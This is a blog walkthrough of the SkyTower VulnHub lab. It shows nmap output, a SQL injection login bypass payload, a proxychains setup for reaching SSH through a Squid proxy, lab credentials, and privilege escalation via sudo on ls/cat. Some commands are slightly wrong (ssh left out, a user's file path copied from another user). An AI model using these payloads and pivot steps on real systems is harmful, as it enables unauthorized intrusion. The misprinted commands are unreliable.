Total Pageviews

Wednesday, August 25, 2021

SkyTower - VULNHUB - Linux

 SkyTower - VULNHUB - Linux


Complete walkthrough, of the season content:

RECOGNITION PHASE:

NETWORK DISCOVERY:


We can use a couple of tools  in order to make this task, ane of them is arp-scan that use request over arp protocol on broadcast mode, and wait for the hosts response via this type of protocol  as you can see below:




NMAP:

On this step, from the attaker machine we recover information about the open ports and services of out target machine. We can use some options in order to execute scripts and obtain information about vulnerabilities on the external host.

nmap -sC -sV -p - -v -n 192.168.1.37 -oN target_nmap

Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-24 18:37 CEST

NSE: Loaded 153 scripts for scanning.

NSE: Script Pre-scanning.

Initiating NSE at 18:37

Completed NSE at 18:37, 0.00s elapsed

Initiating NSE at 18:37

Completed NSE at 18:37, 0.00s elapsed

Initiating NSE at 18:37

Completed NSE at 18:37, 0.00s elapsed

Initiating Ping Scan at 18:37

Scanning 192.168.1.37 [2 ports]

Completed Ping Scan at 18:37, 0.00s elapsed (1 total hosts)

Initiating Connect Scan at 18:37

Scanning 192.168.1.37 [65535 ports]

Discovered open port 80/tcp on 192.168.1.37

Discovered open port 3128/tcp on 192.168.1.37

Completed Connect Scan at 18:37, 2.60s elapsed (65535 total ports)

Initiating Service scan at 18:37

Scanning 2 services on 192.168.1.37

Completed Service scan at 18:37, 11.02s elapsed (2 services on 1 host)

NSE: Script scanning 192.168.1.37.

Initiating NSE at 18:37

Completed NSE at 18:37, 20.06s elapsed

Initiating NSE at 18:37

Completed NSE at 18:37, 0.00s elapsed

Initiating NSE at 18:37

Completed NSE at 18:37, 0.00s elapsed

Nmap scan report for 192.168.1.37

Host is up (0.00079s latency).

Not shown: 65532 closed ports

PORT     STATE    SERVICE    VERSION

22/tcp   filtered ssh

80/tcp   open     http       Apache httpd 2.2.22 ((Debian))

| http-methods: 

|_  Supported Methods: POST OPTIONS GET HEAD

|_http-server-header: Apache/2.2.22 (Debian)

|_http-title: Site doesn't have a title (text/html).

3128/tcp open     http-proxy Squid http proxy 3.1.20

|_http-server-header: squid/3.1.20

|_http-title: ERROR: The requested URL could not be retrieved


NSE: Script Post-scanning.

Initiating NSE at 18:37

Completed NSE at 18:37, 0.00s elapsed

Initiating NSE at 18:37

Completed NSE at 18:37, 0.00s elapsed

Initiating NSE at 18:37

Completed NSE at 18:37, 0.00s elapsed

Read data files from: /usr/bin/../share/nmap


The conclusion of nmap scan is that we found the following open ports with the services:




EXPLOITATION:


80/tcp http :



Using a sqlInjectionsuch ' || OR 1=1 #, on email field we'll bypass the login:


With user and password credentials, we should access via SSH, but  where is the service ?


This service only is open, when you access from the Squid http proxy such a proxy on your SSH connection. For this reason you should configure a local proxy, for example with proxychains tool:

Proxychain:

cat /etc/proxychains.conf  | grep -v "\#"
dynamic_chain
proxy_dns 
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5  127.0.0.1 9050
http 192.168.1.37 3128


NMAP:

Scanning the open services, for all ports using the proxy with nmap tool:

Nmap scan report for 192.168.1.37
Host is up (0.00068s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u1 (protocol 2.0)
| ssh-hostkey: 
|   1024 4f:1e:17:00:5f:ec:28:7c:97:17:da:da:3c:b9:36:73 (DSA)
|   2048 1f:ca:22:be:83:a1:38:3f:a6:fe:bc:63:83:99:08:21 (RSA)
|_  256 f6:3b:95:46:6e:a7:0f:72:1a:67:9e:9b:8a:48:5e:3d (ECDSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.12 seconds


SSH connection, hash an error when open the users session, on .bashrc file that close the user session, for this reason the previous target is move the file, with the following command:

proxychains john@192.168.1.37 "mv /home/john/.bashrc /home/john/bashrc_backup"

And finally we gain the remote connection:

proxychains john@192.168.1.37



Using the script lse.sh (linux enumeration script), we found an mysql connection  with user root and credentials root.





**mysql -u root -p

On the target database using the towersky schema, in the table user  we can find the user: sara with credentials : ihatethisjob


And this credentials allow a new, connection via SSH with proxychains tool using the same technique:

proxychains sara@192.168.1.37 "mv /home/john/.bashrc /home/john/bashrc_backup"

proxychains sara@192.168.1.37


PRIVILEGE ESCALATION:


with sara's login and the command sudo -l,  the system show what binaries on the target machine vould sara execute such a root user.

And there are two commands allowed: ls /accounts/* and cat /accounts/*

Using the following trick, we can access to the flag file and get the root user credentials.



And this is all for this lab machine, I hope that you enjoy with the Linux server and you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.

with kind regards, f0ns1

at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Mi primera experiencia en una conferencia:

En la jornada posterior a un evento importante toca analizar, en este caso me centro en mi participación como speaker en #librecon2022. ¿Cóm...